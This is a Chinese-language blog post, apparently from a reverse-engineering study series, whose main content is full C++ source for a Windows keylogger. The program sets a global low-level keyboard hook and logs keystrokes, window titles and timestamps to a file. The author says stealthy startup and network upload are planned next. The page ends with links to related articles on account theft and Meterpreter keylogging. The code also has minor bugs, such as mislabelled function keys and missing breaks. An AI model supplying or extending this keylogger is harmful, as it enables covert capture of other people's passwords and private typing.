这里没有截好屏

代码实现

设置键盘钩子

BOOL HookKeyBoard()
{BOOL bRet = FALSE;kKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, //  low-level keyboard input eventsHookProcedure, //  回调函数地址GetModuleHandle(NULL), // A handle to the DLL containing the hook procedure NULL //线程ID,欲勾住的线程(为0则不指定,全局));if (!kKeyboardHook) {//  如果SetWindowsHookEx 失败std::cout << "SetWindowsHookEx()获取句柄失败" << std::endl;}else{std::cout << "cheer!准备就绪!" << std::endl;MSG Msg{};  //  统一初始化while (GetMessage(&Msg, NULL, 0, 0) > 0){TranslateMessage(&Msg);DispatchMessage(&Msg);}bRet = TRUE;}return bRet;
}

钩子回调

LRESULT CALLBACK HookProcedure(int nCode, WPARAM wParam, LPARAM lParam)
{std::ofstream myfile(fileName, std::ios::out | std::ios::app);BOOL  caps = FALSE;  //  默认大写关闭SHORT capsShort = GetKeyState(VK_CAPITAL);std::string outPut;std::stringstream ssTemp;  //  string 字符流if (capsShort > 0){//  如果大于0,则大写键按下,说明开启大写;反之小写caps = TRUE;}/*WH_KEYBOARD_LL uses the LowLevelKeyboardProc Call Back*///  LowLevelKeyboardProc Structure KBDLLHOOKSTRUCT *p = (KBDLLHOOKSTRUCT *)lParam;//  wParam和lParam参数包含关于键盘消息的信息。if (nCode == HC_ACTION){// Messsage data is ready for pickup// Check for SHIFT keyif (p->vkCode == VK_LSHIFT || p->vkCode == VK_RSHIFT){//  WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, or WM_SYSKEYUP.if (wParam == WM_KEYDOWN){bShift = TRUE;}if (wParam == WM_KEYUP){bShift = FALSE;}else{bShift = FALSE;}}//  Start Loging keys now we are setupif (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN){//  Retrieves a handle to the foreground window (the window with which the user is currently working).HWND currentWindow = GetForegroundWindow();  //  返回前台窗口,获得当前窗口//  Check if we need to write new window outputif (currentWindow != lastWindow){SYSTEMTIME t{};GetLocalTime(&t);  //  获得当前系统时间int day = t.wDay;int month = t.wMonth;int year = t.wYear;int hour = t.wHour;int min = t.wMinute;int sec = t.wSecond;int dayName = t.wDayOfWeek;//  Build our output headerssTemp << "\n\n " << Dayofweek(dayName) << " - " << day << "/" << month << "/" << year << "  ";ssTemp << hour << ":" << min << ":" << sec;outPut.append(ssTemp.str());ssTemp.clear();//  GetWindowTextACCCint c = GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));std::cout << c;ssTemp << " Current Window: " << cWindow << "\n\n";//outPut.append(temp.str());std::cout << ssTemp.str() << std::endl;myfile << ssTemp.str();// Setup for next CallBackCClastWindow = currentWindow;}//  Now capture keysif (p->vkCode){ssTemp.clear();ssTemp << HookCode(p->vkCode, caps, bShift);std::cout << ssTemp.str();myfile << ssTemp.str();}//  Final output logic}}//  hook procedure must pass the message *Always*myfile.close();return CallNextHookEx(NULL, nCode, wParam, lParam);  //  hook链
}

获取时间

std::string Dayofweek(int code)
{// Return Day of the year in textstd::string name;switch (code){case 0: name = "[SUNDAY]"; break;case 1: name = "[MONDAY]"; break;case 2: name = "[TUESDAY]"; break;case 3: name = "[WENSDAY]"; break;case 4: name = "[THURSDAY]"; break;case 5: name = "[FRIDAY]"; break;case 6: name = "[SATURDAY]"; break;default:name = "[UNKOWN]";}return name;
}

转换符号,真费劲

这是就是IDA里面那一长串case内容

std::string HookCode(DWORD code, BOOL caps, BOOL shift)
{std::string key;switch (code) // SWITCH ON INT{// Char keys for ASCI// No VM Def in header case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break;case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break;case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break;case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break;case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break;case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break;case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break;case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break;case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break;case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break;case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break;case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break;case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break;case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break;case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break;case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break;case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break;case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break;case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? "S" : "s"); break;case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break;case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break;case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break;case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break;case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break;case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break;case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break;// Sleep Keycase VK_SLEEP: key = "[SLEEP]"; break;// Num Keyboard case VK_NUMPAD0:  key = "0"; break;case VK_NUMPAD1:  key = "1"; break;case VK_NUMPAD2: key = "2"; break;case VK_NUMPAD3:  key = "3"; break;case VK_NUMPAD4:  key = "4"; break;case VK_NUMPAD5:  key = "5"; break;case VK_NUMPAD6:  key = "6"; break;case VK_NUMPAD7:  key = "7"; break;case VK_NUMPAD8:  key = "8"; break;case VK_NUMPAD9:  key = "9"; break;case VK_MULTIPLY: key = "*"; break;case VK_ADD:      key = "+"; break;case VK_SEPARATOR: key = "-"; break;case VK_SUBTRACT: key = "-"; break;case VK_DECIMAL:  key = "."; break;case VK_DIVIDE:   key = "/"; break;// Function Keyscase VK_F1:  key = "[F1]"; break;case VK_F2:  key = "[F2]"; break;case VK_F3:  key = "[F3]"; break;case VK_F4:  key = "[F4]"; break;case VK_F5:  key = "[F5]"; break;case VK_F6:  key = "[F6]"; break;case VK_F7:  key = "[F7]"; break;case VK_F8:  key = "[F8]"; break;case VK_F9:  key = "[F9]"; break;case VK_F10:  key = "[F10]"; break;case VK_F11:  key = "[F11]"; break;case VK_F12:  key = "[F12]"; break;case VK_F13:  key = "[F13]"; break;case VK_F14:  key = "[F14]"; break;case VK_F15:  key = "[F15]"; break;case VK_F16:  key = "[F16]"; break;case VK_F17:  key = "[F17]"; break;case VK_F18:  key = "[F18]"; break;case VK_F19:  key = "[F19]"; break;case VK_F20:  key = "[F20]"; break;case VK_F21:  key = "[F22]"; break;case VK_F22:  key = "[F23]"; break;case VK_F23:  key = "[F24]"; break;case VK_F24:  key = "[F25]"; break;// Keyscase VK_NUMLOCK: key = "[NUM-LOCK]"; break;case VK_SCROLL:  key = "[SCROLL-LOCK]"; break;case VK_BACK:    key = "[BACK]"; break;case VK_TAB:     key = "[TAB]"; break;case VK_CLEAR:   key = "[CLEAR]"; break;case VK_RETURN:  key = "[ENTER]"; break;case VK_SHIFT:   key = "[SHIFT]"; break;case VK_CONTROL: key = "[CTRL]"; break;case VK_MENU:    key = "[ALT]"; break;case VK_PAUSE:   key = "[PAUSE]"; break;case VK_CAPITAL: key = "[CAP-LOCK]"; break;case VK_ESCAPE:  key = "[ESC]"; break;case VK_SPACE:   key = "[SPACE]"; break;case VK_PRIOR:   key = "[PAGEUP]"; break;case VK_NEXT:    key = "[PAGEDOWN]"; break;case VK_END:     key = "[END]"; break;case VK_HOME:    key = "[HOME]"; break;case VK_LEFT:    key = "[LEFT]"; break;case VK_UP:      key = "[UP]"; break;case VK_RIGHT:   key = "[RIGHT]"; break;case VK_DOWN:    key = "[DOWN]"; break;case VK_SELECT:  key = "[SELECT]"; break;case VK_PRINT:   key = "[PRINT]"; break;case VK_SNAPSHOT: key = "[PRTSCRN]"; break;case VK_INSERT:  key = "[INS]"; break;case VK_DELETE:  key = "[DEL]"; break;case VK_HELP:    key = "[HELP]"; break;// Number Keys with shiftcase 0x30:  key = shift ? "!" : "1"; break;case 0x31:  key = shift ? "@" : "2"; break;case 0x32:  key = shift ? "#" : "3"; break;case 0x33:  key = shift ? "$" : "4"; break;case 0x34:  key = shift ? "%" : "5"; break;case 0x35:  key = shift ? "^" : "6"; break;case 0x36:  key = shift ? "&" : "7"; break;case 0x37:  key = shift ? "*" : "8"; break;case 0x38:  key = shift ? "(" : "9"; break;case 0x39:  key = shift ? ")" : "0"; break;// Windows Keyscase VK_LWIN:     key = "[WIN]"; break;case VK_RWIN:     key = "[WIN]"; break;case VK_LSHIFT:   key = "[SHIFT]"; break;case VK_RSHIFT:   key = "[SHIFT]"; break;case VK_LCONTROL: key = "[CTRL]"; break;case VK_RCONTROL: key = "[CTRL]"; break;// OEM Keys with shift case VK_OEM_1:      key = shift ? ":" : ";"; break;case VK_OEM_PLUS:   key = shift ? "+" : "="; break;case VK_OEM_COMMA:  key = shift ? "<" : ","; break;case VK_OEM_MINUS:  key = shift ? "_" : "-"; break;case VK_OEM_PERIOD: key = shift ? ">" : "."; break;case VK_OEM_2:      key = shift ? "?" : "/"; break;case VK_OEM_3:      key = shift ? "~" : "`"; break;case VK_OEM_4:      key = shift ? "{" : "["; break;case VK_OEM_5:      key = shift ? "\\" : "|"; break;case VK_OEM_6:      key = shift ? "}" : "]"; break;case VK_OEM_7:      key = shift ? "'" : "'"; break; //TODO: Escape this char: "// Action Keyscase VK_PLAY:       key = "[PLAY]";case VK_ZOOM:       key = "[ZOOM]";case VK_OEM_CLEAR:  key = "[CLEAR]";case VK_CANCEL:     key = "[CTRL-C]";default: key = "[UNK-KEY]"; break;}return key;
}## 标题

释放键盘钩子

void unhookKeyboard()
{if (kKeyboardHook != 0){UnhookWindowsHookEx(kKeyboardHook);}exit(0);
}

main

int main()
{std::cout << "start !" << std::endl;//  设置键盘钩子if (!HookKeyBoard()){std::cout << "Hook KeyBoard Failed!" << std::endl;}unhookKeyboard();//释放hook
}

康康效果

在D盘创建一个txt文件记录


上个学期在网吧玩steam被盗号了,当时觉得可能是获取cookie,现在想想这个方法不成熟,不能持久登录,应该就是这种键盘钩子
今天实现了一部分功能,如果要达到网吧的效果,需要加上隐蔽启动和网络连接,先发现其他样本,学到14章以后在加上网络功能

恶意代码逆向静态分析之键盘记录(键盘钩子)以及代码实现 有手就行相关推荐

  1. 工具开发|键盘记录工具原理及代码实现

    作者: Beard林 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x01 对于键盘记录简述 键盘记录一般用在后渗透中,以此方法寻求扩大战果.有些c2工具集成了这个功能, ...

  2. c语言程序怎么还原回代码,逆向分析:如何一步步还原C代码

    逆向实战 应各位的建议,加了注释,喜欢的看官点个赞支持一下,哈哈! 程序入口 如何查找程序入口? main 函数被调用前要先调用的函数如下: GetVersion() _heap_init() Get ...

  3. python实现键盘记录木马

    pyHook 第三方库,用于捕捉特定的Windows事件,封装了所有底层调用,我们 只需要关注程序逻辑. 更多内容及使用方法请自行查找 下载链接:http://sourceforge.net/proj ...

  4. linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录

    环境:        攻击机:192.168.200.101   //kali Linux 2020 靶机:192.168.200.103    (未打MS17-010补丁windowsService ...

  5. python你TM太皮了——区区30行代码就能记录键盘的一举一动

    先看看效果 Like This↓ 一.公共WiFi 公用电脑什么的 在我们日常在线上工作.玩耍时,不论开电脑.登录淘宝.玩网游 统统都会用到键盘输入 在几乎所有网站,例如淘宝.百度.126邮箱等等 为 ...

  6. Python盗号原理-代码实现截屏键盘记录远程发送

    最简单的,也是技术手段相对较低的盗号方式当属钓鱼了(当然,社工更考验心理),除了钓鱼网站,就是发布某些带有诱惑性的工具,诱导消费者下载,运行后开启后门,或者启用钩子进行键盘记录.本篇文章我们就来讲一讲 ...

  7. Python盗号原理-代码实现截屏键盘记录远程发送(不要做坏事)

    这年头盗号的从出不穷,不是脱裤就是社工钓鱼.今天呢我们就以前面的几篇技术文章做铺垫,来讲一下python盗号的原理(学习用途,请勿用于违法犯罪),知己知彼方能百战不殆嘛. 脱裤我们就不多提了,无非就是 ...

  8. Windows下C++通过Hooks记录键盘敲击记录的代码

    将写内容过程中比较好的内容备份一下,下边内容内容是关于Windows下C++通过Hooks记录键盘敲击记录的内容. #define _WIN32_WINNT 0x0500 #include #incl ...

  9. 3.6 Meterpreter 键盘记录

    目录 一.预备知识 1.Metasploit 框架介绍 2.渗透攻击基础 二.实验环境 三.实验步骤 一.预备知识 1.Metasploit 框架介绍 Metasploit框架由库.接口和模块三部分组 ...

最新文章

  1. Spring_Spring@Transactional
  2. 网站被k不要慌,看看“老油条”们是怎么解决的吧!
  3. 关于html5和css3的新特性
  4. dummy.php 下载,internal dummy connection
  5. python快速上手 让繁琐工作自动化 英文版_入门python:《Python编程快速上手让繁琐工作自动化》中英文PDF+代码...
  6. 我们并没有觉得MapReduce速度慢,直到Spark出现
  7. 括弧匹配检验(信息学奥赛一本通-T1354)
  8. LeetCode14最长公共前缀
  9. 华为鸿蒙HarmonyOS,华为鸿蒙HarmonyOS-系统概述
  10. QT应用SQL数据库,简单全面的应用,增删改查。
  11. linux提取曲线数据软件,曲线图转数据工具软件(Engauge Digitizer)提取文献中的数据...
  12. 10亿数据导入oracle方案
  13. 【Cocos游戏】《天天炫斗》:在手机上感受街机狂潮
  14. 京东网站页面编写(HTML、CSS、JS),包括京东秒杀的倒计时、轮播图等功能
  15. 论文阅读(5)栉水母利用涡流反弹动力学,胜过其他凝胶状的游泳者(2019)
  16. 谣言检测相关论文阅读笔记:Towards Multi-Modal Sarcasm Detection via Hierarchical Congruity Modeling
  17. H5 语音合成播报功能
  18. 最简单启动vue前端项目
  19. linux下opengl开发环境,Linux下配置OpenGL开发环境
  20. EXCEL 一个工作簿转多个工作簿

热门文章

  1. python xlrd使用_在Python中使用xlrd以文本形式读取数值Excel数据
  2. Burg法求解AR(p)模型参数及MATLAB实现
  3. npm包--rimraf
  4. HIT2020春软件构造lab1
  5. (附源码)ssm航空客运订票系统 毕业设计 141612
  6. 手把手教你写专利申请书/如何申请专利
  7. 阿里和微博的异地多活方案zt
  8. AXI协议详解(1)-协议简介
  9. webstorm2020背景和字体_怎么为WebStorm更换主题 修改字体样式
  10. 几种国内芯片测序格式和 Illumina Omni 位点集格式的对比